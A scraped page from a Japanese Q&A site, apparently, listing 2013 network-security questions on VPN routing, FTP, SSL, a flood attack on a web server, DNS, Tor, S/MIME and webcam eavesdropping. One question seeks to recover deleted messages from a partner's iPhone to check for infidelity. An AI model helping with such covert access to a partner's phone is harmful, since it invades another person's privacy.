RT107eというルータの設定について、解らない事だらけで誰か教えてください。特定のポート（今回はFTP）のみVPN経由で外部へアクセスしたいです。【拠点A】 LAN IP:192.168.1.0/24 ルータIP:192.168.1.1 クライアントPCAの設定 _IP:192.168.1.2 _NET MASK:255.255.255.0 _GW:192.168.1.1 【拠点B】 LAN IP:192.168.2.0/24 ルータIP:192.168.2.1 クライアントPCBの設定 _IP:192.168.2.2 _NET MASK:255.255.255.0 _GW:192.168.2.1 ※DNSはプロバイダから教えてもらったアドレスを設定しています。課題が色々あって、簡単なところから始めています。今までにできた事です。・拠点A、拠点Bともにインターネット接続ができていて、両拠点にあるクライアントPCから外部WEBサーバ（yahooとか）接続できるようになりました。・拠点Aと拠点BはVPNで接続できるよう設定できました。・ファイル共有は拠点Aと拠点Bで問題なく接続できるよう設定できました。・両拠点にあるWEBサーバ（クライアントAとBに構築）も相互にアクセスできるよう設定できました。今度は、拠点AからFTPを使い外部のFTPサーバへアクセスする時、拠点Aから外部へ接続するのではなく、一旦、VPNにて拠点Bを介して外部のFTPサーバへアクセスさせたいです。ルーティングの設定かと思うんですけど、さっぱり解りません。（クライアントも何か設定する必要があるのでしょうか？）一応、拠点Aから下記設定にて外部のFTPサーバへアクセスする事はできました。拠点Aの設定は大体こんな感じです。（何やってんの？っていう突っ込みは沢山あります・・・） ip route 192.168.2.0/24 gateway tunnel 1 ip lan1 address 192.168.1.0/24 provider filter routing connection provider lan1 name LAN: provider lan2 name PPPoE/0/1/5/0/0:Base1 pp select 1 ・・・ ip pp secure filter in 120 121 123 124 125 201 ip pp secure filter out 120 121 123 124 125 999 dynamic 301 302 ・・・ ip pp nat descriptor 10 pp enable 1 provider set 1 Base1 provider dns server pp 1 1 provider select 1 no tunnel enable all tunnel select 1 tunnel name Base2 ipsec tunnel 1 ipsec sa policy 1 1 esp aes-cbc sha-hmac ipsec ike keepalive log 1 off ipsec ike keepalive use 1 on heartbeat 10 6 ipsec ike local address 1 192.168.2.1 ipsec ike local id 1 192.168.2.0/24 ipsec ike pre-shared-key 1 text Base1_key ipsec ike remote address 1 192.168.2.1 ip tunnel tcp mss limit auto tunnel enable 1 ip filter 120 reject * * udp,tcp 135 * ip filter 121 reject * * udp,tcp * 135 ip filter 122 reject * * udp,tcp netbios_ns-netbios_ssn * ip filter 123 reject * * udp,tcp * netbios_ns-netbios_ssn ip filter 124 reject * * udp,tcp 445 * ip filter 125 reject * * udp,tcp * 445 ip filter 201 pass * 192.168.1.2 tcp * www ip filter 999 pass * * * * * ip filter dynamic 301 * * ftp ip filter dynamic 302 * * www nat descriptor type 10 masquerade nat descriptor masquerade incoming 10 forward 192.168.1.2 nat descriptor masquerade static 10 1 192.168.1.2 tcp www tftp host 192.168.1.2 どのような設定をすれば良いのでしょうか？その他、ツッコミなどもお願いします。よろしくお願いします。

質問日時: 2013/09/24 14:25 質問者: amino_pl

解決済

4

0
FTPダウンロードの減少について

FTPダウンロードの減少について質問です。あまり専門的なものは除き、市販されているソフトウェアのアップデータ等の配布元として、以前はFTPダウンロードが多かったような気がしますが、今はHTTPダウンロードが増えたような気がします。あまり詳しくないですが、企業でもFTPダウンロードはブロックしているところが多いようです。これは、FTPの脆弱性やFTPに関わるウイルスの増加に伴うものなのでしょうか。 ※FTPダウンロードはFTPクライアントではなくブラウザを使用しています。

質問日時: 2013/09/24 11:06 質問者: saruchan002

ベストアンサー

1

0
SSLの改ざん検知後の行動について

SSLには通信内容の改ざん検知機能がついていますが、実際に改ざんが検知された場合、次にどのように振舞うのでしょうか？ SSLを強制切断するのですか？再送するのでしょうか？よろしくお願いします。

質問日時: 2013/09/20 12:59 質問者: sainte

ベストアンサー

4

0
webサーバが攻撃を受けている時の対処方法は?

レンタルサーバを利用しています。専用サーバ利用です。CentOS release 4.4です。複数のドメインをここで管理していて、攻撃を受けているのはその1つのドメインで、メインで利用している物です。一昨日夜から攻撃が始まりました。最初は攻撃と気が付かずただのサーバ不調によるダウンと思っていました。自分でコントロールパネルより再起動を試みたのですが、症状が改善しなかったので、サーバ管理会社に確認してもらった所、攻撃を受けているとのことでした。「海外からの不正なアクセスが行われており、Apacheの同時接続数が超過したことが原因で、ウェブサイトへのアクセスがつながりにくい状態となりました。」「サーバーやサービスに対するサービス妨害攻撃サービスなどに対して許容量を超える要求を送出し、サービスの処理可能量を超えさせ、正規の要求を処理させないものがあります。」と言うものだそうです。 (カッコ内については管理会社からのコメント。色々やりとりしているので、書き込まれた順番はまちまちです) アクセスログを見ると、 xxx.xxx.xxx.xxx - - [20/Sep/2013:02:03:40 +0900] "POST / HTTP/1.1" 200 11836 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (IPアドレス以外はすべて同じ) が、1秒に4～6回くらいの数でアクセスしています。「再起動を行わせて頂きましたが、すぐに不正なアクセスが行われ、MaxClients(同時接続数)を超過してしまうことで、再びウェブサーバーが不安定な状態となってしまいます。」また、「MaxClientsを増やすことは通常はMaxClientsのエラーの解決策でございますが、明らかに不正な接続へのリクエストとして受け付ける数を増やすこととなり、リクエストに割り当てられたメモリ使用も多くなるため、メモリ不足となってしまう可能性が考えられます。」さらに、「根本的な解決策がないため、○○○.comドメインの廃止」「高スペックのサーバーへの移設など、ネットワーク機器でのブロックが可能なサービスへの移設なども対策として挙げられます。」と回答されました。現状では、 chmod 000 /var/www/vhosts/○○○.com の実行。(これは、不正アクセスを受け、情報を書き換えられるのを防ぐためと考えてOKでしょうか?) DNSゾーンの削除(○○○.com. 600 A xxx.xxx.xxx.xxx等) を行い、他のドメインは正常動作、メインサイトのみ閉鎖(403)となっています。今回の件を自分で解決方法を探していると日付が近い以下の情報を確認しました。 9月18日に関連したサイバー攻撃に関しての注意喚起 http://www.lac.co.jp/security/alert/2013/09/12_alert_01.html これではないかと思い、日付が変わった本日1:00頃再度DNSレコードを戻し、公開してみたのですが、数分も経たず攻撃がスタートしてしまいました。前置きが長くなりましたが… この状態で何か解決策はありませんか? 管理会社が指定した解決方法は、・○○○.comドメインの廃止(さすがに無理です) ・高スペックのサーバーへの移設(予算的に厳しいです) と、問題があり、ちょっと難しいです。 .htaccessで海外のアクセスを遮断と考えたのですが、そもそも".htaccessにアクセスする=同時接続数を超える事になる"ので意味は無いですよね… 他に何かいい方法は無いでしょうか? サーバ管理に関しては初心者レベルです。そのため、必要な情報が記載されていないかもしれませんので、その時は指摘をお願いします。

質問日時: 2013/09/20 02:55 質問者: master-3rd

解決済

3

0
ネームサーバの調べ方を教えてください

ネームサーバの調べ方について教えてください。 http://www.intodns.com/yahoo.co.jp Yahoo を例にしてみました。ここで、 1)「Domain NS records」という欄と 2)「NS records from your nameservers」という欄がありどちらも、ネームサーバなのですが、 1)は、ドメインのwhois情報に載っているネームサーバ？ 2)は、DNSサーバからのレコードに記載されているネームサーバであることまでは理解しています。 1)は、どうやったら調べられるのでしょうか。 whois を叩いて、ネームサーバの欄を整形して見るくらいしか無いのでしょうか。効率的に調べられるコマンドや方法などあれば教えてください。 2)は、 dig NS [対象ドメイン] で得られることは了解です。今の困りごととして、1)と2)が異なるドメインが複数あって、修正のためにそれを調査したいというのが目的です。どうぞよろしくお願いいたします。

質問日時: 2013/09/19 02:17 質問者: likeivy

解決済

1

0
彼女の浮気を調べたいですが

私には今、付き合って4年の彼女がいます。ですがこの4年間で、私は6回も浮気をされてきました。毎回許しているのですが、私は外資系の会社員という事もあり、今、外国に1年間の長期出張に出かけています。私は彼女との結婚を本気で考えていますが、この一年の間で彼女が浮気をしていたら、私は完全に縁を切る事に決めました。本題に入りますと、帰国した時にiPhoneアナライザーを使って彼女の携帯を調べようと思います。ですが、彼女は常にやましいラインの履歴は消しています。そのバックアップせずに普通に履歴を消した人やブロックした人の履歴も見る事は可能なのでしょうか？バックアップせずに消した履歴に関してはどのサイトを見てもみつかりませんでした。困っています。詳しい方、回答をお願いします。

質問日時: 2013/09/15 12:57 質問者: Macairman

解決済

4

0
DNSサーバーにアクセスする際のエフェメラルポート

お世話になります。 YAMAHAのVPNルーターRTX1100で、不要なポートのフィルタリング設定を行っております。 WindowsXPを1台で、接続テストを行い、ログを取りました。 WindowsXPが使用するエフェメラルポートは、1025～5000、WindowsVista以降のOSが使用するエフェメラルポートエフェメラルポートは、49152～65535、とのこと。エフェメラルポート http://ja.wikipedia.org/wiki/%E3%82%A8%E3%83%95%E3%82%A7%E3%83%A1%E3%83%A9%E3%83%AB%E3%83%9D%E3%83%BC%E3%83%88 ここから、5001～65535のポートを、TCP、UDP、IN、OUT、すべてにおいて閉鎖しましたところ、インターネットに接続できませんでした。ログを調べましたところ、WindowsXPのプライベートアドレス、5万番台ポート→DNSサーバー53番ポートへのパケットが、破棄されていました。外部WEBサーバー80番ポートへのパケットは、すべて、1025～5000番の範囲に収まっていました。閉鎖するポート番号を、5001～49151に変更することで、インターネットにも接続出来るようになりました。 WindowsXPの場合でも、OSのエフェメラルポートは、1025～5000ですが、それは、TCPパケットに関するお話で、DNSサーバーにアクセスするUDPパケットに関しては、49152～65535である、ということは、ありますでしょうか。どうぞよろしくお願い致します。

質問日時: 2013/09/12 17:36 質問者: ERUERI

ベストアンサー

1

0
Apacheでhttpd-ssl.confエラー

当方、windows7 32bitでwwwサーバを組んでいる超初心者です。 apacheは2.2.25、Active Perlは5.16.3.1で OpenSSLは1_0_1です。、 c/apache softoware Foundation c/perl c/openssl 以上の場所にインストールしています。 http://tako.jugem.cc/?eid=719 ここのサイトの説明通りにやりました。但し、openssl.cfg は c/apache softoware Foundation/apache2.2/conf/sslに入れましたが。上記のサイトで > openssl req -config openssl.cfg -new -out ./ssl.key/server.csr 色々聞かれるので埋めるとあり、色々埋めました。 Apacheのhttpd.confの変更、 httpd-ssl.confの変更も行いました。↓ SSLCertificateFile "C:/Apache Software Foundation/Apache2.2/conf/ssl/server.crt" SSLCertificateKeyFile "C:/Apache Software Foundation/Apache2.2/conf/ssl/server.key" と変更しました。 server.crtファイルも server.keyファイルも上記の場所にあるのですが、これでapacheを起動すると The requested operation has faild! とエラーメッセージが出てしまいます。 httpd-ssl.confを有効にしなければ、apacheは普通に動いてくれます。何が足りないのか、私には解りません。考えうるエラーの原因が思い当たったらご教授願います。

質問日時: 2013/09/11 18:43 質問者: RIOT1970

ベストアンサー

1

0
大量L2スイッチにVLAN追加した際の確認方法

L2スイッチが何十台もあるネットワークにVLANを追加することになりました。設定変更は遠隔で出来るのですが、追加したVLANが正しく機能するかの確認（立証）って皆さんどうしてますか？スイッチ間は全て1Qトランク接続、新VLANのアクセスポートを用意しないスイッチもあります。

質問日時: 2013/09/11 13:10 質問者: 1qazxsw2

ベストアンサー

1

0
NASのMACアドレス

とある出先の会社のネットワークに接続する際はネットワーク管理者に使いたいPCのmacアドレスを登録して貰って、登録されるとDHCPでIPアドレスが払い出されてインターネットに繋がるようになっております。そのネットワークにNASを接続したのですがmacアドレスを登録して貰ったにもかかわらずDHCPでIPが払い出されない状態です。 NASのIPを固定で設定した上で、DomainViewというツールでネットワーク内のPCの情報を見るとmacアドレスが00-00-00-00-00-00と表示されます。多分これがIP払い出されない原因だとおもわれるのですがDHCPサーバにNASのMACアドレスを認識して貰って正常にIPが払い出されるようになるには無いか方法があるのでしょうか。ちなみに、そのネットワークでは固定IPが禁止されています。また、私の調べた内容で勘違い等ありましたらご教示ください。 NASはバッファローのLinkStation LS-X2.0TLです。

質問日時: 2013/09/11 11:46 質問者: felix98

ベストアンサー

4

0
本当でしょうか？

http://news.guideme.jp/kiji/eeb5dc73a8e03c8479ff786f4c07fb3c にあるのですが、、NSAは約2億5000万ドルを費して、国際暗号標準および製品を弱体化させ、NSAが解読できるようにした。あるケースでは、2007年にMicrosoftの技術者が致命的セキュリティー欠陥をみつけたところ、それは当初NSAが国際標準化グループに「強要」したものだった。これって、本当でしょうか？また、何を調べれば確認できるでしょうか？

質問日時: 2013/09/08 11:28 質問者: koinobori7

ベストアンサー

3

0
the onion rooter　tor接続

torでGOOGLE　CHROMEで接続したいのですが、Vidalia Relay Bundleというのを公式サイトから落としてインストールしました。Vidaliaを起動してコネクトしましたと英語で出るのですが、chromeのプロキシの設定で接続から設定を選びこの接続にプロキシサーバーを使うにチェックを入れています。そこにアドレス127.0.0.1としポート8118と入力しているのですがTORで接続できません。確認くんで調べてもIPが変わりません。FIREFOXだとソケット接続でTOR使った場合は接続できるのですが安全性に問題ありと出ます。CHROMEではどうすればいいのでしょうか？OSはWINDOWS7 64です。

質問日時: 2013/09/02 06:36 質問者: bvuhfi

ベストアンサー

1

0
個人と個人の間のＳ/ＭＩＭＥ

暗号通信に関して、考えています。ウィキペディア　では、Ｓ/ＭＩＭＥ　における個人の証明書に関しては、よくある基本的な個人証明書は所有者を電子メールアドレスに結び付ける観点でのみ所有者の身元を検証し、その人の名前や職業は検証しない。となっていて、身元確認などはしていないようです。　これでは、証明書が本人であることを証明するものになっていないように思えます。証明書なしで、ある人物から、ある名前で、あるメールアドレスから、メールが届いた。場合とあまり変わらないと考えれれますが、個人に対して発行されたＳ/ＭＩＭＥ　証明書の意義は何でしょうか？個人と個人のメールを主に扱う場合に、Ｓ/ＭＩＭＥ　の証明書を確認するメールソフトにしても意味がないように思えてしまいます。メールソフトに、証明書の確認機能が付いている場合の意義についてお分かりの方、よろしくお願いいたします。

質問日時: 2013/08/30 12:13 質問者: uyama33

ベストアンサー

7

0
楽天でログインしたままのサイトのURLについて

ログインして楽天トラベルで検索したページを掲示板に載せたんですが、楽天トラベルで検索するとその都度ページのurlが変わりますよね。それって私のログイン時そのままに他の人からも見えたということでしょうか? つまり、ログインしたままですので、私のパソコンからは私の名前やポイントなどの情報がわかりますよねそれが他の人からも見えたのでしょうか? もう少しわかりやすくいいますと http://travel.rakuten.co.jp/ ←ここから大阪新阪急ホテル等の検索をして、そのホテルの地図アクセス部分のurlが行くたびに変わるのです検索するたびにhttp://travel.rakuten.co.jp/HOTEL/*****/rtmap.html←の*****の数字部分が変わるけれど表示されている画像などは同じなのでこれは検索した人が見ているページそのまま(つまり名前やポイントなど出ているまま)を表示するサイトなのではと思ったんですこのURLを掲示板に載せると、他人がそのサイトへいけば、それはログインして検索した人の情報丸見え(名前やポイント)なのではないかと思ったんですが大丈夫なのでしょうか? それからhttp://travel.rakuten.co.jp/HOTEL/*****/rtmap.htmlのサイトの一つがしばらくするとそこへアクセスするとエラー： 404 Not Foundとなっていたのも不思議なのですが? この問題が発生してから何度かそのurlのサイトにアクセスもできたので不思議です。初心者の質問かもしれませんが、本当に困ってますので、ぜひ教えて下さいよろしくお願いします

質問日時: 2013/08/28 22:22 質問者: kirinsan8

解決済

1

0
WebカメラとWebマイクで盗撮・盗聴？

こちらのIPアドレスを知っている何者かがこちらのMacBookProに標準搭載されている WebカメラとWebマイクに何かの方法でアクセスして盗撮・盗聴される事って可能なのでしょうか？もう一度言いますが相手がIPアドレスを知っている事が前提です。あと、現在はMacBookProにWindows7をインストールした状態で使用しています。以下質問です。１：ネットで調べてみるとWebカメラに不正にアクセスして盗撮が可能という情報を見た事があるので心配になりました。しかしそこで気になったのはMacBookProのWebカメラが起動すると緑色のランプが点灯するはずなので、こちらからは分かると思うのですがこの起動ランプを消した状態で相手を盗撮するなんて可能なのでしょうか？２： Webマイクの入力の状態は常にONにしていました。この状態でこちらのIPを知っている相手から不正にアクセスして PCの電源が入っている時に盗聴されてしまう事ってあるのでしょうか？ 3：対策についてです。１についてはWebカメラを何かで塞ぐしかないのでしょうか？２についてですが、今はマイクのデバイスを無効にしていますがこれで問題ないでしょうか？他に対策方法があれば教えて頂けないでしょうか？

質問日時: 2013/08/24 09:56 質問者: slightwave

解決済

3

0

【セキュリティ】に関するカテゴリ

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう！

質問する（無料）

【セキュリティホール・脆弱性】に関するコラム/記事

弁護士が解説！あなたの声を行政に届ける「パブリックコメント」制度のすべて

社会に対する意見や不満、疑問。それを発信する場所は、SNSやブログ、そしてニュースサイトのコメント欄など多岐にわたる。教えて!gooでも「ヤフコメ民について」というタイトルのトピックがあり、この投稿の通り、...
弁護士が語る「合法と違法を分けるオンラインカジノのシンプルな線引き」

「お金を賭けたら違法です」ーーこう答えたのは富士見坂法律事務所の井上義之弁護士。オンラインカジノが違法となるかどうかの基準は、このように非常にシンプルである。しかし2025年にはいって、違法賭博事件が相次...
釣りと密漁の違いは？知らなかったでは済まされない？事前にできることは？

知らなかったでは済まされないのが法律の世界であるが、全てを知ってから何かをするには少々手間がかかるし、最悪始めることすらできずに終わってしまうこともあり得る。教えてgooでも「釣りと密漁の境目はどこです...
カスハラとクレームの違いは？カスハラの法的責任は？企業がとるべき対応は？

東京都が、客からの迷惑行為などを称した「カスタマーハラスメント」、いわゆる「カスハラ」の防止を目的とした条例を、全国で初めて成立させた。条例に罰則はなく、2025年4月1日から施行される。この動きは自治体...